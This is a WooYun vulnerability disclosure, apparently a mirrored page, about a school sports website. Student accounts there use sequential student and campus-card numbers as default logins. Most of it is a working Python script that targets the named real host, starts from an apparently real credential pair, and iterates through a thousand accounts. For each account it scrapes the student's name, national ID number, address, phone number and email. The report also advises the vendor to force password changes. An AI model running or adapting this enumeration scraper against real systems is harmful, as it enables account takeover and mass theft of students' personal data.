乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-17: 厂商已经确认,细节仅向厂商公开 2015-12-27: 细节向核心白帽子及相关领域专家公开 2016-01-06: 细节向普通白帽子公开 2016-01-16: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
帐号为校园卡学号默认使用校园卡帐号登录so~~规律就来了
==问题描述==帐号为校园卡学号默认使用校园卡帐号登录so~~规律就来了如某人的校园卡帐号是2014xxxx1812 校园卡帐号是233233然后一测试,就会发现使用帐号2014xxxx1813 校园卡帐号233234也能登录里面的信息还是比较多的哈
然后,利用身份证号码可以去这个网站的重置密码...
ps:重置密码的界面真漂亮........于是,我们就登录了
抱着要好好学习的心态.我又来了遍python
# -*- coding: utf-8 -*-import urllibimport urllib2import cookielibimport reusername = 201418130116password = 243383ct = 0for j in range(1,1000): cookie = cookielib.CookieJar() handler = urllib2.HTTPCookieProcessor(cookie) opener = urllib2.build_opener(handler) values = {"username":username,"password":password} data = urllib.urlencode(values) url = "http://schoolsports.infosport.com.cn/Login.aspx" request = urllib2.Request(url,data) response = opener.open(request) # next is use the cookie post a page # and 搞出里面需要的信息 # next is 构造变量 批量访问之! my_url = "http://schoolsports.infosport.com.cn/StudentInfo.aspx" req = urllib2.Request(my_url) response = opener.open(req) #print response.read() content = response.read().decode('utf-8') # pattern = re.compile('<input id="IDCard" name="IDCard" type="text" value="(.*?)" class="txt"/></td>') # items = re.findall(pattern,content) pattern1 = re.compile('<input id="Text1" name="name" readonly="readonly" type="text" value="(.*?)" class="txt" /></td>') item = re.findall(pattern1,content) if not item: ct+=1 print "no fake passwd" if ct==10: print "此学号段宣布over" break username+=1 password+=1 continue ct = 0 print "学号:",username, print "校园卡帐号",password, print "姓名:",item[0], pattern2 = re.compile('<input id="Text2" name="sex" readonly="readonly" type="text" value="(.*?)" class="txt"/></td>') item = re.findall(pattern2,content) print "性别:",item[0], pattern = re.compile('<input id="IDCard" name="IDCard" type="text" value="(.*?)" class="txt"/></td>') item = re.findall(pattern,content) print "身份证号码:",item[0], pattern = re.compile('<input id="Address" name="Address" type="text" value="(.*?)" class="txt" /></td>') item = re.findall(pattern,content) print "地区",item[0], pattern = re.compile('<input id="Mobile" name="Mobile" type="text" value="(.*?)" class="txt"/></td>') item = re.findall(pattern,content) print "手机号",item[0], pattern = re.compile('<input id="EMail" name="EMail" type="text" value="(.*?)" class="txt"/></td>') item = re.findall(pattern,content) print "电子邮箱",item[0], print ""# items2 = re.findall(pattern2,content) # for i in items2: # print i[0],i[1], username+=1 password+=1print "Over, Have A Good Day"
<img src="
" alt="" />
由于涉及到学生的身份证,户籍地等信息,建议强制用户更改初始密码..
危害等级:高
漏洞Rank:14
确认时间:2015-12-17 16:21
已通报系统所属单位
暂无